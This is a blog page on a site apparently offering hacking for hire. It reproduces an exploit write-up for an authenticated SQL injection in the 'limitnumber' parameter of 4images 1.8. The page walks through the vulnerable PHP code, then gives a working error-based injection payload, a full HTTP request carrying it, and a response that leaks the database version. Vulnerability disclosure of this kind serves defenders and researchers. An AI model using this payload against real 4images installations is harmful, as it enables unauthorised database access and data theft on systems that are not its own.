Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    86381890

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: 4images 1.8 - 'limitnumber' SQL Injection (Authenticated)
# Exploit Author: Andrey Stoykov
# Software Link: https://www.4homepages.de/download-4images
# Version: 1.8
# Tested on: Linux



Source Analysis:


Line #658

- User action defined

if ($action == "findimages") {


Line #661

- Vulnerable condition

$condition = "1=1";


Line #654

- Default limit 50

show_input_row($lang['results_per_page'], "limitnumber", 50);



Line #736

- Define limit start

$limitstart = (isset($HTTP_POST_VARS['limitstart'])) ? trim($HTTP_POST_VARS['limitstart']) : "";
if ($limitstart == "") {
  $limitstart = 0;


Line #743

- Define limit number

$limitnumber = trim($HTTP_POST_VARS['limitnumber']);
  if ($limitnumber == "") {
    $limitnumber = 5000;
  }


Line #763

- Define user input variables

$limitfinish = $limitstart + $limitnumber;



Line #786

- SQL statement

$sql = "SELECT i.image_id, i.cat_id, i.user_id, i.image_name, i.image_media_file, i.image_date".get_user_table_field(", u.", "user_name")."
            FROM ".IMAGES_TABLE." i
            LEFT JOIN ".USERS_TABLE." u ON (".get_user_table_field("u.", "user_id")." = i.user_id)
            WHERE $condition
            ORDER BY $orderby $direction

			// Vulnerable user input of limitnumber
            LIMIT $limitstart, $limitnumber";


Line #852

- Display user input defined previously

show_hidden_input("limitnumber", $limitnumber);



Exploit POC:


1+procedure+analyse(extractvalue(rand(),concat(0x3a,version())),1,1)--+-


HTTP Request:

POST /4images/admin/images.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 406
Origin: http://127.0.0.1
DNT: 1
Connection: close
Referer: http://127.0.0.1/4images/admin/images.php?action=modifyimages
Cookie: 4images_lastvisit=1628349389; 4images_userid=1; sessionid=7ndqdr2u04gqs9gdme12vhco87
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: frame
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

__csrf=7aa2dd8597dfe4302237bbfeb200fbd8&action=findimages&image_id=&image_name=&image_description=&image_keywords=&cat_id=0&image_media_file=&image_thumb_file=&dateafter=&datebefore=&downloadsupper=&downloadslower=&ratingupper=&ratinglower=&votesupper=&voteslower=&hitsupper=&hitslower=&orderby=i.image_name&direction=ASC&limitnumber=1+procedure+analyse(extractvalue(rand(),concat(0x3a,version())),1,1)--+-



HTTP Response:

HTTP/1.1 200 OK
...
<b>XPATH syntax error: ':10.1.37-MariaDB'</b>